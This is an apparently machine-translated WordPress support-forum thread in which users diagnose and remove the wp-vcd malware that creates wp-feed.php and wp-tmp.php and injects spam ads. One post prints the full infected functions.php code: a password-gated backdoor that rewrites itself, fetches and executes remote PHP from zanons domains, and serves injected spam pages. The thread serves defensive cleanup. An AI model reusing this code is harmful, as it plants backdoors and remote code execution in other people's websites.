Pregunta sobre Arreglando WordPress de Wordpress:

wp-feed.php

0
0
0

Un usuario preguntó 👇

Hola,

Sigo recibiendo un mensaje que dice que ‘../wp-includes/wp-feed.php’ no es parte de la instalación de wordpress donde wordfence indica que es malicioso.

¿Así que lo elimino y luego se vuelve a crear automáticamente?

¿Alguna idea por favor?

(@macmanx)

Moderador voluntario

Hace 3 años, 3 meses

El informe de Wordfence es ciertamente correcto.

Recomiendo informar el problema en https://wordpress.org/support/plugin/wordfence para que los desarrolladores y la comunidad de soporte del plugin puedan ayudarlo con esto.

O siga esta guía con atención. Una vez que haya terminado, es posible que desee implementar algunas (si no todas) de las medidas de seguridad recomendadas.

(@jerodbarlow)

Hace 3 años, 3 meses

Hola James y Rik0399,

Recientemente descubrimos que se trata de adware en un sitio que operamos, pero nos resulta difícil mantener el código en cuenta. Lo que sí sabemos es que este pequeño error básicamente crea el archivo wp-feed.php y enumera cualquier dirección IP asociada con un usuario registrado. Entonces, si inicia sesión en WordPress en su sitio, ya no verá los anuncios de spam.

Sin embargo, las direcciones IP que nunca han iniciado sesión en el sitio ciertamente recibirán las notificaciones y, a veces, serán redirigidas desde todo el sitio.

Pensé en publicar en caso de que pudiera obtener el código fuente de manera responsable. Ahora estamos revisando nuestros archivos con la esperanza de resolver el problema.

Jerod

(@ rik0399)

Hace 3 años, 3 meses

Hola,

Gracias por eso,

He estado trabajando en todo, pero hasta ahora, sin alegría.

(@paolopanatta)

Hace 3 años, 2 meses

Pruébelo si se trata de acción / recuperación de WP Rocket.

(@itsmrkim)

Hace 3 años, 2 meses

Hola chicos, tengo el mismo problema en mi sitio en este momento, sin embargo, solo afecta a ciertos tipos de usuarios: solo afecta a los usuarios de Windows para computadoras de escritorio y afecta a todos los usuarios del teléfono bolsillo / tableta. ¿Pudiste encontrar la causa raíz / el guión de esta pregunta?

Saludos, Sam K.

Esta respuesta fue modificada hace 3 años, 2 meses por.

(@jerodbarlow)

Hace 3 años, 2 meses

Hola Sam,

No puedo recordar / encontrar el código exacto que extrajimos, pero se encontró en nuestro archivo functions.php en el tema, y ​​estoy seguro de que el código era analógico y visible en la parte frontal del código fuente de nuestro sitio.

¡Espero que ayude!

Jerod

(@akodia)

Hace 3 años, 2 meses

Hola chicos,

Tuve el mismo problema hoy y lo solucioné usando el plugin Anti-Malware Security y Brute-Force Firewall. Confirmó que el archivo infectado es el archivo functions.php en el tema actual del sitio web. Luego se agregó algún código malicioso. El plugin lo elimina y es bueno que te vayas.

Por favor, intente informar a los demás si le funcionó o no.

Todo lo mejor. MAMÁ

(@bmerigan)

Hace 3 años, 1 mes

Encontré wp-feed.php en mi directorio wp-includes. Es parte de una infección de malware. Este archivo contiene las direcciones IP de los usuarios que iniciaron sesión en un sitio de WordPress. No muestra las notificaciones de inyección a los usuarios autenticados.

Los archivos que debe verificar y eliminar: wp-feed.php wp-vcd.php wp-tmp.php Numerosas copias de class.theme-module.php Y extraiga un montón de código desde el principio de todos los archivos functions.php. .

Esta respuesta fue modificada hace 3 años, hace un mes por.

(@bobdesign)

Hace 3 años, 1 mes

Solo para usted, agregue los agujeros functions.php en la carpeta del tema en su contenido de wp y todo estará bien.

Puede encontrar algunos en línea con “wp-vcd.php” …… esto es malware.

Salud.

(@ embalaje88)

Hace 2 años, 11 meses

Oye, tengo la misma pregunta y este tema me ayudó a resolverla, ¡gracias! Debajo de lo que hice: – cambié todas sus contraseñas para todos los WP, FTP, base de datos – para todos los WP instalados (no tenía mucho), vaya a wp-content / theme / YOURTHEME / functions.php y comprobar, si el código inicial no es sospechoso. El mío aparece a continuación:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ac043657a4e80d5afcce1c523ad9e8c0'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				

				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('///$start_wp_theme_tmp([sS]*)//$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?phpn" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?phpn" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='08b370e35d008b6591dd40b0eec23025';
        if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
?><?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '207025345d762fe3f77e7d5b3e5664a5'))
	{
		switch ($_REQUEST['action'])
			{
				case 'get_all_links';
					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
						{
							$data['code'] = '';
							
							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
								{
									$data['code'] = $_[1];
								}
							
							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "rn";
						}
				break;
				
				case 'set_id_links';
					if (isset($_REQUEST['data']))
						{
							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
							
							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
								{
									print "true";
								}
						}
				break;
				
				case 'create_page';
					if (isset($_REQUEST['remove_page']))
						{
							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
								{
									print "true";
								}
						}
					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
						{
							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
								{
									print "true";
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_URL_CD";
			}
			
		die("");
	}

	
if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
	{
		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
		if ($data -> full_content)
			{
				print stripslashes($data -> content);
			}
		else
			{
				print '<!DOCTYPE html>';
				print '<html ';
				language_attributes();
				print ' class="no-js">';
				print '<head>';
				print '<title>'.stripslashes($data -> title).'</title>';
				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
				print '<meta name="robots" content="index, follow" />';
				print '<meta charset="';
				bloginfo( 'charset' );
				print '" />';
				print '<meta name="viewport" content="width=device-width">';
				print '<link rel="profile" href="http://gmpg.org/xfn/11">';
				print '<link rel="pingback" href="';
				bloginfo( 'pingback_url' );
				print '">';
				wp_head();
				print '</head>';
				print '<body>';
				print '<div id="content" class="site-content">';
				print stripslashes($data -> content);
				get_search_form();
				get_sidebar();
				get_footer();
			}
			
		exit;
	}

?>

– elimine el comienzo de los artículos masculinos – vaya a / wp-include y verifique si tiene algunos de esos archivos:

wp-tmp.php wp-vcd.php wp-feed.php wp-cd.php

Si es así, verifíquelos, probablemente sean maleware y elimínelos. – revise su sitio web si el problema persiste – instale el plugin Wordfence y revise su sitio web nuevamente 😉

(@ locha9066)

Hace 2 años, 11 meses

hola @ pap88, tengo el mismo problema.

Me registré wp-tmp.php Se ve como esto: https://pastebin.com/i68AgRPi

Leí el código, este código parece querer redirigir el acceso de todos los clientes a mi sitio también para acceder a su sitio en un grado incremental en muchas otras búsquedas. setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);.

Borré un código extraño en function.php y wp-tmp.php, wp-vcd.php, wp-feed.php, wp-cd.php. Pero cuando mi sitio web F5, genera automáticamente wp-tmp.php. ¿Algún método de depuración inicia la causa? Cualquier sugerencia de usted es la solución para mí en esta situación.

Dominio: http://www.zanons.xyz/code.php

(@bmerigan)

Hace 2 años, 11 meses

Como dije antes, estos archivos también:

Numerosas copias de class.theme-module.php Y extraiga un montón de código desde el principio de todos los archivos functions.php.

Verifique TODOS los archivos functions.php en el tema y elimine TODOS los archivos class.theme-module.php Estos se pueden encontrar en diferentes lugares en un tema. Si el tema se carga antes de que se eliminen todos, los demás archivos vuelven.

(@ locha9066)

Hace 2 años, 11 meses

@bmerigan, ¿sabes dónde comienza el problema?

No subo mi fuente en el alojamiento, se está ejecutando en localhost.

No sé por qué tienes un código extraño function.php.

¿Algún método para detectar algún plugin o tema tiene algún código extraño para depurar?

Utilizo el tema: Flatsome y WPResidence en ThemeForest (ambos temas tienen los mismos problemas).

Es el mismo plugin en ambos temas: Loco Translate, Yoast THIS.

(@bmerigan)

Hace 2 años, 11 meses

Mi experiencia fue descargar un tema de un sitio «gratuito» en lugar del creador / fuente original. El sitio del que obtuve era poco fiable y solo proporcionaba temas infectados.

Mi experiencia fue que instalé un tema infectado que contenía el código y los archivos maliciosos.

(@ entr0phy777)

Hace 2 años, 10 meses

Mi caso es que /ajax-search-pro/includes/functions/class.theme-modules.php es el único lugar donde class.theme-module.php.

Así que la fuente del aditivo también puede ser cuestionable, como dice bmerigan.

¿Solucionó tu problema??

0 / 0

Deja una respuesta 0

Tu dirección de correo electrónico no será publicada.